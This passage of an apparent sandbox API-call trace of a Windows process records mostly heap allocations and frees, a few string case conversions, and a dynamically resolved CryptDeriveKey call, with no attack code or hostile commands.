HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0190.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa4c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.067] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0190.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.068] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.075] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.075] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.075] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.075] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.075] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 